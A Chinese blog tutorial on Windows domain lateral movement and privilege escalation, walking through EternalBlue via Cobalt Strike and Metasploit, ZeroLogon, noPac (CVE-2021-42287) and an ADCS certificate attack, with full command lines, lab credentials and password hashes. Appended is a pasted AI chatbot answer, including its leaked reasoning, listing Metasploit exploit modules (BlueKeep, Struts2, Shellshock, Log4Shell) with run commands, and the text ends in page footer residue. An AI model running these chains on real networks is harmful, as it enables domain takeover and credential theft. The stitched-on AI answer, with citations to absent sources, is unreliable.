【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝

章节点

IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP,Plink,DCOM,SSH;Exchange,LLMNR投毒,Kerberos_TGS,GPO&DACL,域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等。

面试时总会提问一些域控提权漏洞细节,特此补充

横向移动-系统漏洞-CVE-2017-0146(永恒之蓝)

CVE-2017-0146(MS17010)

影响版本

Windows 7 8.1 10; Windows Server 2008 2012 2016
随着新系统初始状态已经打上了补丁,漏洞利用将会越来越局限

插件检测-横向移动

CS联动MSF-检测&利用

cs(各种插件)只支持漏洞检测,不支持漏洞的利用,所以将新建一个会话移交给msf进行进一步的利用
1、CS创建外联监听器
在这里插入图片描述
2、CS执行联动MSF
在这里插入图片描述
也可以手工在cs输入命令

spawn back_msf

3、MSF监听联动配置

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8787
run

在这里插入图片描述
4、添加路由

run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表

在这里插入图片描述
5、检测模块(检测是否存在永恒之蓝漏洞)

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.3.21-32 //设置扫描目标段
set threads 5 //设置扫描线程数
run 

在这里插入图片描述
6、利用模块

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp //正向连接上线
set rhost 192.168.3.25 //设置连接目标		#set rhosts 192.168.3.21-32 //设置扫描范围,批量检测与利用
run

在这里插入图片描述
在这里插入图片描述

横向移动-域控提权-CVE-2014-6324

在域控DC没有打补丁的情况下,普通域成员用户通过MS14-068漏洞生成高权限用户票据,导入内存之后即可连接(10小时有效期)
见往期文章PTT横向移动CVE-2014-6324 漏洞利用
https://blog.csdn.net/weixin_53009585/article/details/129788657

横向移动-域控提权-CVE-2020-1472(NetLogon)

漏洞背景

未经身份验证的攻击者只需要能访问域控的135端口即可通过NetLogon远程协议连接域控并重置域控机器账户的hash,从而导致攻击者可以利用域控的机器账户导出域内所有用户的Hash(域控的机器账户默认具有DCSync权限),进而接管整个域

漏洞原理

NetLogon协议认证的加密模块存在缺陷,导致攻击者可以在没有凭据的情况下通过认证。通过认证后,调用NetLogon协议中RPC函数NetrServerpasswordSet2来重置域控机器账户的Hash,进而接管全域

影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows
Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core
installation) Windows Server 2012 Windows Server 2012 (Server Core
installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server
Core installation) Windows Server 2016 Windows Server 2016 (Server
Core installation) Windows Server 2019 Windows Server 2019 (Server
Core installation) Windows Server, version 1903 (Server Core
installation) Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

poc检测:
https://github.com/SecuraBV/CVE-2020-1472.git
exp重置域账号密码:
https://github.com/blackarrowsec/redteam-research
https://github.com/dirkjanm/CVE-2020-1472

恢复密码:
https://github.com/risksense/zerologon
https://github.com/SecureAuthCorp/impacket
0、获取计算机名:

nbtscan -v -h 192.168.3.21

1、连接DC清空凭证:

proxychains python3 cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21

2、获取域内HASH:

proxychains python3 secretsdump.py OWA2010CN-GOD\$@192.168.3.21 -just-dc -no-pass

3、连接域控PTH:

python wmiexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21

4、后续恢复密码:

横向移动-域控提权-CVE-2021-42287

前提条件

一个域内普通账号与密码
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

影响版本

Windows基本全系列(未打补丁)

python版本EXP

https://github.com/WazeHell/sam-the-admin

利用过程

windows下(貌似不能使用):报错 ‘KRB5CCNAME’ 不是内部或外部命令,也不是可运行的程序
或批处理文件。
在这里插入图片描述
看了下github项目详情 只能在kali下运行
在这里插入图片描述
等了两年都没有再更新了……
kali下:这里的kali是22年版本,靶机也是之前的god.org中的DC,旨在使用域内普通用户账号利用漏洞获得域控DCsystem权限。当然还是需要使用代理
在这里插入图片描述

C#版本EXP

项目地址:https://github.com/cube0x0/noPac

利用过程:

1、使用代理后:
修改Host绑定域名和IP
2、扫描探针:

noPac scan -domain god.org -user webadmin -pass admin!@#45

3、利用连接:

noPac -domain god.org -user webadmin -pass admin!@#45 /dc owa2010cn-god.god.org /mAccount dadd /mPassword sdadasdsa /service cifs /ptt
PsExec \\owa2010cn-god.god.org cmd

横向移动-域控提权-CVE-2022-26923(ADCS攻击)

项目地址:https://github.com/ly4k/Certipy
Certipy是一款基于Python开发的强大工具,该工具可以帮助广大研究人员枚举并利用活动目录证书服务(AD CS)中的错误配置项。

概述

当Windows系统的Active Directory证书服务(CS)在域上运行时,由于机器账号中的dNSHostName属性不具有唯一性,域中普通用户可以将其更改为高权限的域控机器账号属性,然后从Active Directory证书服务中获取域控机器账户的证书,导致域中普通用户权限提升为域管理员权限。

影响

Win8.1、Win10、Win11、WinServer2012R2、WinServer2016、WinServer2019、WinServer2022等版本

前提条件

1、一个域内普通账号
2、域内存在证书服务器

DC没有安装Active Directory证书服务
在这里插入图片描述
DC已安装Active Directory证书服务
在这里插入图片描述
Kali添加访问域内信息 /etc/hosts

192.168.3.130 xiaodi.local
192.168.3.130 xiaodi-WIN-3C7SS32SQ6R-CA
192.168.3.130 WIN-3C7SS32SQ6R.xiaodi.local

获取CA结构名和计算机名

certutil -config - -ping

在这里插入图片描述
域内信息

192.168.1.15
test Pass123
xiaodi-WIN-3C7SS32SQ6R-CA
WIN-3C7SS32SQ6R.xiaodi.local

1、申请低权限用户证书:

certipy req 'xiaodi.local/test:Pass123@WIN-3C7SS32SQ6R.xiaodi.local' -ca xiaodi-WIN-3C7SS32SQ6R-CA -template User -debug

2、检测证书

certipy auth -pfx test.pfx

3、创建一个机器账户:

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.130 addComputer pwnmachine 'CVEPassword1234*'

4、设置机器账户属性(dNSHostName和DC一致):

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.130 setAttribute 'CN=pwnmachine,CN=Computers,DC=xiaodi,DC=local' dNSHostName '["WIN-3C7SS32SQ6R.xiaodi.local"]'

5、再次申请证书:

certipy req 'xiaodi.local/pwnmachine$:CVEPassword1234*@192.168.3.130' -template Machine -dc-ip 192.168.1.15 -ca xiaodi-WIN-3C7SS32SQ6R-CA

6、检测证书:

certipy auth -pfx ./win-3c7ss32sq6r.pfx -dc-ip 192.168.3.130

7、导出HASH:

python3 secretsdump.py 'xiaodi.local/win-3c7ss32sq6r$@WIN-3C7SS32SQ6R.xiaodi.local' -hashes :10e02bef2258ad9b239e2281a01827a4

8、利用HASH:

python3 wmiexec.py xiaodi.local/administrator@192.168.3.130 -hashes aad3b435b51404eeaad3b435b51404ee:e6f01fc9f2a0dc96871220f7787164bd
<think>我们正在回答用户关于MetasploitFramework经典漏洞利用模块的问题,除了永恒之蓝(MS17-010)之外,用户希望了解其他经典模块。根据引用[2]和引用[3]的内容,我们可以知道Metasploit框架中的漏洞利用模块(exploits)是攻击流程的核心,而payloads、auxiliary等模块则配合使用。因此,我们可以列举一些历史上著名的漏洞利用模块,这些漏洞影响广泛,在Metasploit中也有对应的利用模块。注意:引用[1]永恒之蓝漏洞利用时可能出现蓝屏,说明漏洞利用的稳定性可能存在问题,但其他经典模块同样可能存在类似问题。下面列举几个经典漏洞利用模块:1.**CVE-2019-0708 (BlueKeep)**:这是一个影响Windows远程桌面服务(RDP)的严重漏洞,与永恒之蓝类似,可以在无需用户交互的情况下实现远程代码执行。Metasploit中供了多个利用模块,例如`exploit/windows/rdp/cve_2019_0708_bluekeep_rce`。2.**CVE-2017-0143 (EternalRomance)**:这是SMB协议中的另一个漏洞,属于永恒系列漏洞之一,影响SMBv1。模块路径:`exploit/windows/smb/ms17_010_eternalromance`。3.**CVE-2014-0160 (Heartbleed)**:心脏滴血漏洞,影响OpenSSL。该漏洞允许攻击者读取受保护的内存内容,从而可能获取敏感信息(如私钥)。Metasploit中的模块:`auxiliary/scanner/ssl/openssl_heartbleed`(注意这是一个辅助模块,用于信息泄露,不是直接获取shell的利用模块,但后续可以结合获取的信息进行进一步攻击)。4.**CVE-2012-1823 (PHP-CGI漏洞)**:影响PHP的远程代码执行漏洞,模块路径:`exploit/multi/http/php_cgi_arg_injection`。5.**CVE-2010-3333 (Microsoft WordRTF栈溢出漏洞)**:通过恶意RTF文件实现远程代码执行,模块路径:`exploit/windows/fileformat/ms10_087_rtf_pfragments_bof`。6. **CVE-2008-4250 (MS08-067)**:这是另一个经典的WindowsSMB漏洞,在永恒之蓝之前被广泛利用。模块路径:`exploit/windows/smb/ms08_067_netapi`。7.**CVE-2017-8464 (LNK漏洞)**:通过恶意LNK文件实现远程代码执行,模块路径:`exploit/windows/fileformat/cve_2017_8464_lnk_rce`。8.**CVE-2019-19781 (CitrixADC/Netscaler漏洞)**:影响Citrix应用交付制器和网关的漏洞,可导致远程代码执行。模块路径:`exploit/linux/http/citrix_dir_traversal_rce`。9.**CVE-2021-44228 (Log4Shell)**: Log4j2远程代码执行漏洞,影响广泛。模块路径:`exploit/multi/http/log4shell_header_injection`。10.**CVE-2020-1472 (ZeroLogon)**: Netlogon特升漏洞,允许攻击者获取管理员限。模块路径:`auxiliary/admin/dcerpc/cve_2020_1472_zerologon`(这是一个辅助模块,用于重置密码,然后配合其他攻击手段)。注意:以上漏洞利用模块在Metasploit中的路径可能会随着版本更新而变化,使用时请先搜索确认。在回答中,我们按照漏洞的CVE编号和名称进行列举,并简要说明漏洞影响和模块路径。同时,我们根据引用[2]和[3]的内容,醒用户Metasploit模块的分类(如exploit、auxiliary)以及使用注意事项。最后,我们生成相关问题。</think>### Metasploit Framework 经典漏洞利用模块(除永恒之蓝外) Metasploit Framework 包含大量经典漏洞利用模块,以下是影响力较大的案例及其技术原理: --- #### **1. CVE-2019-0708 (BlueKeep)** - **漏洞类型**:Windows 远程桌面服务(RDP)远程代码执行 - **危害**:无需用户交互即可获得SYSTEM- **利用模块**: ```bash use exploit/windows/rdp/cve_2019_0708_bluekeep_rce set RHOSTS [目标IP] set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit ``` - **技术特点**:通过畸形RDP协议数据触发内核级内存损坏[^2] - **影响范围**:Windows 7/2008 R2及更早系统 --- #### **2. CVE-2017-5638 (Apache Struts2)** - **漏洞类型**:OGNL表达式注入 - **危害**:通过HTTP头实现远程命令执行 - **利用模块**: ```bash use exploit/multi/http/struts2_content_type_ognl set RHOSTS [目标URL] set TARGETURI /login.action set CMD "whoami" # 直接执行系统命令 exploit ``` - **技术特点**:利用Content-Type头注入恶意OGNL表达式[^3] - **著名案例**:导致Equifax 1.43亿用户数据泄露 --- #### **3. CVE-2014-6271 (Shellshock)** - **漏洞类型**:Bash环境变量注入 - **危害**:通过CGI接口实现系统命令执行 - **利用模块**: ```bash use exploit/multi/http/apache_mod_cgi_bash_env_exec set RHOSTS [目标IP] set TARGETURI /cgi-bin/test.sh exploit ``` - **技术特点**:利用Bash解析函数定义时的代码执行缺陷 - **影响范围**:Unix/Linux系统(2014年影响全球5亿设备) --- #### **4. CVE-2012-1823 (PHP-CGI漏洞)** - **漏洞类型**:PHP-CGI参数注入 - **危害**:通过查询字符串执行系统命令 - **利用模块**: ```bash use exploit/multi/http/php_cgi_arg_injection set RHOSTS [目标IP] set TARGETURI /php-cgi exploit ``` - **技术特点**:利用`?-s`等参数直接暴露源码或执行命令[^2] --- #### **5. CVE-2021-44228 (Log4Shell)** - **漏洞类型**:Log4j JNDI注入 - **危害**:通过日志记录功能实现RCE - **利用模块**: ```bash use exploit/multi/http/log4shell_header_injection set RHOSTS [目标URL] set HTTP_HEADER "User-Agent" # 注入点 set SRVHOST [攻击机IP] exploit ``` - **技术特点**:利用${jndi:ldap://}协议加载远程恶意类 --- ### 漏洞利用模块分类 根据引用[2]的框架定义: 1. **远程利用(exploit)** - 如`exploit/unix/ftp/vsftpd_234_backdoor` 2. **客户端攻击** - 如`exploit/windows/browser/ms10_046_shortcut_icon_dllloader` 3. **辅助扫描(auxiliary)** - 如`auxiliary/scanner/http/tomcat_mgr_login` > **注**:所有利用需遵守法律授,测试前务必确认目标系统合规性[^1]。 --- ### 相关问题 1. **如何防御BlueKeep漏洞攻击?** 2. **Metasploit中如何检测Apache Struts2漏洞?** 3. **Shellshock漏洞在现代系统中是否仍然有效?** 4. **Log4Shell漏洞利用需要哪些先决条件?**
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值